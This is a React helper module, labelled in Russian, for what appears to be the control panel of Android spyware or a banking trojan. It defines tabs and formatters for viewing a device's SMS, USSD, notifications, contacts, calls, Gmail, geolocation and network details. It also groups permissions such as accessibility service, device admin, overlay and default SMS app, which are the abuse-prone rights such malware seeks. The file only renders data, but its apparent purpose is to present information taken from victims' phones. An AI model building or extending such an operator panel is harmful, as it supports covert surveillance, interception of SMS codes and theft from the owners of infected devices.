import React from 'react';

export const KEYS_TO_HIDE = [
    'status', 'as', 'org', 'zip', 'wifi_bssid', 'storage_total_gb',
    'cpu_cores', 'is_rooted', 'temperature_celsius'
];

// --- ИЗМЕНЕНИЕ: Добавляем USSD и проверяем наличие всех остальных вкладок ---
export const TABS = [
    { id: 'general', label: 'Общая инфа' },
    { id: 'sms', label: 'Sms' },
    { id: 'ussd', label: 'USSD' },
    { id: 'notifications', label: 'Пуш увед.' },
    { id: 'contacts', label: 'Контакты' },
    { id: 'apps', label: 'Приложение' },
    { id: 'media', label: 'Медия', hidden: true },
    { id: 'calls', label: 'Звонки', requiresSpecialPerms: true },
    { id: 'network', label: 'Сеть и SIM' },
    { id: 'gmail', label: 'Gmail', requiresSpecialPerms: true },
    { id: 'permissions', label: 'Разрешения' },
    { id: 'extra-info', label: 'Доп инфа', hidden: true },
    { id: 'management', label: 'Управление' }
];

export const formatKey = (key) => {
    const map = {
        app_name: 'Имя приложения',
        android_version: 'Версия Android',
        device_brand: 'Бренд',
        device_model: 'Модель',
        language: 'Язык системы',
        cpu_cores: 'Ядра ЦП',
        query: 'IP Адрес',
        country: 'Страна',
        countryCode: 'Код страны',
        region: 'Код региона',
        regionName: 'Регион',
        city: 'Город',
        zip: 'Индекс',
        lat: 'Широта',
        lon: 'Долгота',
        isp: 'Интернет-провайдер',
        timezone: 'Часовой пояс',
        active_network_type: 'Тип сети',
        wifi_ssid: 'Имя сети Wi-Fi',
        wifi_bssid: 'BSSID Wi-Fi',
        wifi_link_speed_mbps: 'Скорость Wi-Fi',
        wifi_rssi: 'Сигнал Wi-Fi',
        level_percent: 'Уровень заряда',
        is_charging: 'Идет зарядка',
        charge_source: 'Источник питания',
        temperature_celsius: 'Температура батареи',
        ram_available_mb: 'RAM доступно',
        ram_total_mb: 'RAM всего',
        storage_available_gb: 'Память доступно',
        storage_total_gb: 'Память всего',
        is_rooted: 'Root-доступ',
        is_default_sms_app: 'Приложение для SMS',
        device_time: 'Время на устройстве',
        'android.permission.READ_SMS': 'Чтение SMS',
        'android.permission.READ_CONTACTS': 'Чтение контактов',
        'android.permission.SEND_SMS': 'Отправка SMS',
        'android.permission.INTERNET': 'Интернет',
        'android.permission.ACCESS_NETWORK_STATE': 'Вид сети',
        'notification_policy_access': 'Тихий режим',          
        'android.permission.READ_PHONE_STATE': 'Состояние телефона',
        'android.permission.CAMERA': 'Камера',
        'android.permission.RECORD_AUDIO': 'Микрофон',
        has_gallery_access: 'Доступ к галерее',
        notification_listener_enabled: 'Чтение уведомлений',
        has_overlay_permission: 'Вызов окон',
        is_ignoring_battery_optimizations: 'Оптимизация батареи',
    };
    const cleanKey = key.replace('android.permission.', '');
    return map[key] || map[cleanKey] || key.replace(/_/g, ' ');
};
export const ValueRenderer = ({ fieldKey, value }) => {
    if (typeof value === 'boolean') {
        return value
            ? <span style={{ color: '#2e7d32', fontWeight: 'bold' }}>✔ Да</span>
            : <span style={{ color: '#d32f2f', fontWeight: 'bold' }}>✖ Нет</span>;
    }
    if (fieldKey === 'device_time' && typeof value === 'string') {
        return <span>{value.replace('T', ' ').substring(0, 19)}</span>;
    }
    if (fieldKey === 'language' && typeof value === 'string') {
        return <span>{value.split('-')[0].toUpperCase()}</span>;
    }
    if (typeof value === 'number' || (typeof value === 'string' && !isNaN(parseFloat(value)))) {
        if (fieldKey.includes('_percent')) return <span>{value} %</span>;
        if (fieldKey.includes('_celsius')) return <span>{value} °C</span>;
        if (fieldKey.includes('_mb')) return <span>{value} MB</span>;
        if (fieldKey.includes('_gb')) return <span>{value} GB</span>;
        if (fieldKey.includes('_mbps')) return <span>{value} Мбит/с</span>;
        if (fieldKey.includes('_rssi')) return <span>{value} dBm</span>;
    }
    return String(value);
};

export const renderStatus = (data) => {
    if (!data) return <p className="error-text">Блок данных отсутствует.</p>;
    if (data.status === 'error') return <p className="error-text">Ошибка: {data.message || 'Не удалось загрузить'}</p>;
    return null;
};

export const renderInfoBlock = (dataObject) => {
    if (!dataObject) return null;
    return Object.entries(dataObject)
        .filter(([key]) => !KEYS_TO_HIDE.includes(key))
        .map(([key, value]) => (
            <p key={key}>
                <strong>{formatKey(key)}:</strong>{' '}
                <ValueRenderer fieldKey={key} value={value} />
            </p>
        ));
};

// ─── Разрешения: метки ────────────────────────────────────────────────────────
export const PERMISSIONS_LABELS = {
    'android.permission.READ_SMS':               'Чтение SMS',
    'android.permission.SEND_SMS':               'Отправка SMS',
    'android.permission.RECEIVE_SMS':            'Получение SMS',
    'android.permission.RECEIVE_MMS':            'Получение MMS',
    'android.permission.READ_CALL_LOG':          'История вызовов (чтение)',
    'android.permission.WRITE_CALL_LOG':         'История вызовов (запись)',
    'android.permission.READ_PHONE_STATE':       'Состояние телефона',
    'android.permission.READ_PHONE_NUMBERS':     'Номера телефона',
    'android.permission.CALL_PHONE':             'Совершение звонков',
    'android.permission.PROCESS_OUTGOING_CALLS': 'Исходящие вызовы',
    'android.permission.READ_CONTACTS':          'Чтение контактов',
    'android.permission.WRITE_CONTACTS':         'Изменение контактов',
    'android.permission.GET_ACCOUNTS':           'Доступ к аккаунтам',
    'android.permission.CAMERA':                 'Камера',
    'android.permission.RECORD_AUDIO':           'Микрофон',
    'android.permission.READ_MEDIA_IMAGES':      'Фото и изображения',
    'android.permission.READ_MEDIA_VIDEO':       'Видеофайлы',
    'android.permission.READ_MEDIA_AUDIO':       'Аудиофайлы',
    'android.permission.READ_EXTERNAL_STORAGE':  'Внешнее хранилище (чтение)',
    'android.permission.WRITE_EXTERNAL_STORAGE': 'Внешнее хранилище (запись)',
    'android.permission.INTERNET':               'Интернет',
    'android.permission.ACCESS_NETWORK_STATE':   'Состояние сети',
    'android.permission.POST_NOTIFICATIONS':     'Отправка уведомлений',
    'notification_listener_enabled':             'Чтение уведомлений',
    'notification_policy_access':                'Режим "Не беспокоить"',
    'is_default_sms_app':                        'SMS-приложение по умолчанию',
    'is_accessibility_enabled':                  'Служба доступности',
    'is_device_admin':                           'Администратор устройства',
    'overlay_permission':                        'Поверх других окон',
    'is_battery_optimized_ignored':              'Без оптимизации батареи',
    'is_ignoring_battery_optimizations':         'Без оптимизации батареи',
};

// ─── Разрешения: группы ───────────────────────────────────────────────────────
export const PERMISSIONS_GROUPS = [
    {
        label: 'SMS и MMS',
        icon: '💬',
        keys: [
            'android.permission.READ_SMS',
            'android.permission.SEND_SMS',
            'android.permission.RECEIVE_SMS',
            'android.permission.RECEIVE_MMS',
        ],
    },
    {
        label: 'Звонки',
        icon: '📞',
        keys: [
            'android.permission.READ_CALL_LOG',
            'android.permission.WRITE_CALL_LOG',
            'android.permission.READ_PHONE_STATE',
            'android.permission.READ_PHONE_NUMBERS',
            'android.permission.CALL_PHONE',
            'android.permission.PROCESS_OUTGOING_CALLS',
        ],
    },
    {
        label: 'Контакты и аккаунты',
        icon: '👥',
        keys: [
            'android.permission.READ_CONTACTS',
            'android.permission.WRITE_CONTACTS',
            'android.permission.GET_ACCOUNTS',
        ],
    },
    {
        label: 'Камера и медиа',
        icon: '📷',
        keys: [
            'android.permission.CAMERA',
            'android.permission.RECORD_AUDIO',
            'android.permission.READ_MEDIA_IMAGES',
            'android.permission.READ_MEDIA_VIDEO',
            'android.permission.READ_MEDIA_AUDIO',
            'android.permission.READ_EXTERNAL_STORAGE',
            'android.permission.WRITE_EXTERNAL_STORAGE',
        ],
    },
    {
        label: 'Сеть',
        icon: '🌐',
        keys: [
            'android.permission.INTERNET',
            'android.permission.ACCESS_NETWORK_STATE',
        ],
    },
    {
        label: 'Уведомления',
        icon: '🔔',
        keys: [
            'android.permission.POST_NOTIFICATIONS',
            'notification_listener_enabled',
            'notification_policy_access',
        ],
    },
    {
        label: 'Специальные права',
        icon: '🔐',
        keys: [
            'is_default_sms_app',
            'is_accessibility_enabled',
            'is_device_admin',
            'overlay_permission',
            'is_battery_optimized_ignored',
        ],
    },
];